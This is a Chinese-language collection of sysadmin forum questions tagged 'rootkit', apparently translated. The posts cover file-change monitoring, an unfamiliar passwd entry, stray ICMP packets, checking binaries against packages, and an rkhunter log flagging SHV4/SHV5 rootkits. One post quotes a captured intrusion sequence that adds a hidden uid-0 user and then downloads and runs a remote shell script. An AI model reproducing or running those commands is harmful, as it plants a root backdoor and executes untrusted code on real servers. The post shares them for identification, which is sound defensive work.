标签: rootkit

寻找一些 (*nix) 软件，它将在服务器上建立“有趣”文件的索引，并在某些文件内容被修改或出现新文件时发出通知。

与 rkhunter 等人类似，但较少关注系统二进制文件，而更多关注通过 Web 提供的可执行文件。

有什么建议吗？

嗨，我刚刚将我的 ubuntu karmic Koala 更新为 Lucid Lynx，并在我的文件 /etc/passwd 上发现了一些奇怪的东西。

rtkit:x:120:130:RealtimeKit,,,:/proc:/bin/false

有人能告诉我它是什么吗？

我可能刚刚检测到我的服务器上的用户已经植根了我的服务器，但这不是我要问的。

有没有人见过这样的命令：

echo _EoT_0.249348813417008_;
id;
echo _EoT_0.12781402577841_;
echo $PATH && a=`env |grep PATH | awk -F '=' '{print $2":/usr/sbin"}'` && export    PATH=$a && echo $PATH;
echo _EoT_0.247556708344121_;
whereis useradd;
echo _EoT_0.905792585668774_;
useradd -p saZlzoRm9L4Og -o -g 0 -u 0 aspnet;
echo _EoT_0.369123892063307_;
wget http://178.xxx.xxx.181/suhosin14.sh;
echo _EoT_0.845361576801043_;
chmod +x suhosin14.sh && ./suhosin14.sh && sleep 5 && ls -la && locate index.php;
echo _EoT_0.161914402299161_;
rm -rf /tmp/ZyCjBiU;
echo _EoT_0.751816968837201_;

在我看来，这是一些自动化脚本的工作，但我不确定是哪一个。

任何人都有这方面的线索？

操作系统是 Debian Lenny，内核 2.6.30-bpo.2-686-bigmem（如果这很重要）。

顺便说一下，上面代码中的链接被屏蔽了，任何想要下载代码的人，我都复制了一份供分析，所以我可以根据要求提供。

编辑：如果有人感兴趣，我正在附上 .sh 脚本的内容作为参考。

#!/bin/sh
PHP=`which php` …

我的计算机正在向任意目的地发送 ICMP 数据包。我无法理解原因。数据包之一的转储是：

Internet Control Message Protocol
    Type: 3 (Destination unreachable)
    Code: 3 (Port unreachable)
    Checksum: 0x811b [correct]
    Internet Protocol, Src: 80.167.113.76 (80.167.113.76), Dst: 192.168.1.2 (192.168.1.2)
        Version: 4
        Header length: 20 bytes
        Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
            0000 00.. = Differentiated Services Codepoint: Default (0x00)
            .... ..0. = ECN-Capable Transport (ECT): 0
            .... ...0 = ECN-CE: 0
        Total Length: 131
        Identification: 0x0631 (1585)
        Flags: 0x00
            0... .... = Reserved bit: Not set
            .0.. .... = Don't …

我想检查我服务器上的所有二进制文件

dpkg -e <path_to_deb_package> <destination>

（例如，rkhunter 可以在进行 probupdate 时对原件进行此检查）

如何使用一个脚本检查所有包？

我已经看到我的系统有两种 rootkit：SHV4 / SHV5。（我要在这里添加一个日志）我试图删除它，但我不能。

有人可以推荐我任何方法吗？

[ Rootkit Hunter version 1.3.8 ]
Checking system commands...
/usr/bin/md5sum                                          [ Warning ]
/usr/bin/pstree                                          [ Warning ]
/usr/bin/top                                             [ Warning ]
/usr/bin/unhide.rb                                       [ Warning ]
/sbin/ifconfig                                           [ Warning ]
/bin/ls                                                  [ Warning ]
/bin/ps                                                  [ Warning ]
/bin/netstat                                             [ Warning ]

Checking for rootkits...

cb Rootkit                                               [ Warning ]
SHV4 Rootkit                                             [ Warning ]
SHV5 Rootkit                                             [ Warning ]
Checking for possible rootkit strings                    [ Warning ]

Checking the local host...

Checking for root equivalent …

可能重复：
我的服务器被黑了 紧急情况

视窗 2000 服务器。

我相信我有一个rootkit。但是，没有什么可以删除它。我什么都试过了。即使仅用于扫描的工具也会失败或使计算机崩溃。

由于没有任何效果，我想尝试手动完成。

编辑：这是一个 Windows 2000 Server 林根。我无法在不炸毁域的情况下重建它。